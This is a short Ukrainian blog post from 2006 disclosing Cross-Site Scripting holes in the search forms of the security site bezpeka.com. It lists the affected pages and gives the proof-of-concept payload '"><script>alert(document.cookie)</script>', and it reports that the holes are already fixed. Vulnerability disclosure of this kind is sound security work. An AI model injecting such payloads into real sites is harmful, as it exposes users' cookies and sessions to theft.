« Добірка експлоітів
Добірка уразливостей »

Уразливості на bezpeka.com

16:40 25.11.2006

24.10.2006

В минулому місяці, 05.09.2006, я знайшов Cross-Site Scripting уразливості на популярному секюріті проекті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

25.11.2006

XSS:

На сторінці http://bezpeka.com/ru/search/ при відправлені POST запиту (в поле “Найти”):
"><script>alert(document.cookie)</script>

На сторінці http://bezpeka.com/en/search/ при відправлені POST запиту (в поле “Find”):
"><script>alert(document.cookie)</script>

Уразливості вже виправлені.


This entry was posted on 16:40 25.11.2006 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.